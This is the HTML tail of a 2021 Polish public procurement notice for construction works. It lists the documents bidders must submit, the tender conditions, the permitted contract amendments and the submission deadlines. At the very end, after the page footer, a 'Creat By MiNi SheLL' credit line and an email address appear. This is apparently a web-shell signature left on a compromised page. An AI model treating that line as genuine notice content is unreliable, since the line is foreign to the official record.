Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;2)	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową (o ile dotyczy), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej (o ile dotyczy) niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 8 do SWZ;3)	Wykazu robót budowlanych, wg wymagań zamawiającego opisanymi w Dziale V ust. 2 pkt 2, wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych ma dotyczyć robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. Wzór wykazu stanowi załącznik nr 5 do SWZ;4)	KWALIFIKACJI osoby, do wykonania zamówienia dla Części I, skierowanej/ych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat jej kwalifikacji zawodowych, w postaci.:•	kopii uprawnień budowlanych, potwierdzające kwalifikacje zawodowe;•	aktualnego zaświadczenie o wpisie na listę członków do Polskiej Izby Inżynierów Budownictwa / właściwej Izby samorządu zawodowego, potwierdzające czynne członkostwo w samorządzie zawodowym oraz posiadanie niezbędnego ubezpieczenia od odpowiedzialności cywilnej.W przypadku uprawnień budowlanych wydanych przez Okręgową Izbę Inżynierów Budownictwa należy przedłożyć •	WPISU w drodze Decyzji do Centralnego Rejestru Osób posiadających uprawnienia budowlane (art. 17 ust. 7 Prawo budowlane),</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Oświadczenie (aktualne na dzień składania ofert) o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez zamawiającego – sporządzone według wzoru stanowiącego - załącznik nr 3 do SWZ.2)	Zobowiązanie (aktualne na dzień składania ofert) podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w sytuacji, gdy wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby - załącznik nr 6 do SWZ. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w niniejszym punkcie, potwierdzające, że stosunek łączący wykonawcę z podmiotem/ami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: a.	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; b.	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; c.	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje zamówienie/ jego część, których wskazane zdolności dotyczą. 3)	Oświadczenie (aktualne na dzień składania ofert), z którego będzie wynikało, które części zamówienia wykonają poszczególni wykonawcy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia i w odniesieniu do warunków opisanych przez zamawiającego (jeśli dotyczy) - załącznik nr 7 do SWZ.4)	Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.5)	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową (o ile dotyczy), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej (o ile dotyczy) niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 8 do SWZ.6)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, dostaw lub usług, wykonywanych wspólnie z innymi wykonawcami, wykaz robót budowlanych ma dotyczyć robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył. Wzór wykazu stanowi załącznik nr 5 do SWZ.7)	Wykazu KWALIFIKACJI osób, do wykonania zamówienia dla Części I, skierowanej/ych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia publicznego oraz informacji o podstawie do dysponowania tą/tymi osobą/ami.8)	Odpowiednie pełnomocnictwo/a.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z opisem SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Warunki Umowy są wiążące dla obu Stron, z zastrzeżeniem poniższych postanowień niniejszego paragrafu.2.	Jeżeli jakieś postanowienie Umowy stanie się nieważne, to - o ile Strony nie uzgodnią postanowienia zastępczego o skutkach możliwie zbliżonych do oryginalnego - stosuje się art. 58 § 3 Kodeksu cywilnego.3.	Mając na uwadze postanowienia art. 455 ust. 1 pkt. 1 Prawa zamówień publicznych, Zamawiający dopuszcza możliwość przedłużenia terminów realizacji Umowy. Termin określony w § 3 ust. 1 może ulec przedłużeniu: a)	z powodu siły wyższej, mającej istotny wpływ na realizację Zamówienia;b)	na skutek działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze Stron;c)	w przypadku wystąpienia okoliczności, których nie dało się przewidzieć w chwili zawarcia Umowy.Przesunięcie terminów, o których mowa powyżej może nastąpić, jeżeli Wykonawca w ciągu 3 dni roboczych od zaistnienia okoliczności, o których mowa w ust. 3 przedłoży Zamawiającemu pisemny wniosek o przesunięcie terminu wykonania robót wraz z uzasadnieniem. Zamawiający, po rozpatrzeniu wniosku, w terminie 3 dni roboczych może wyrazić zgodę na przesunięcie terminu wykonania robót o odpowiedni czas uzgodniony przez obie Strony.4.	Wszelkie zmiany i uzupełnienia Umowy wymagają zgody obu Stron i zachowania formy pisemnego aneksu pod rygorem nieważności, chyba że Umowa stanowi inaczej.5.	Wykonawca nie może domagać się wprowadzenia zmian w Umowie w związku z niewykonaniem lub nienależytym wykonywaniem przez Wykonawcę zobowiązań wynikających z Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-07 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.ms.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-07 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-06</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-17 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com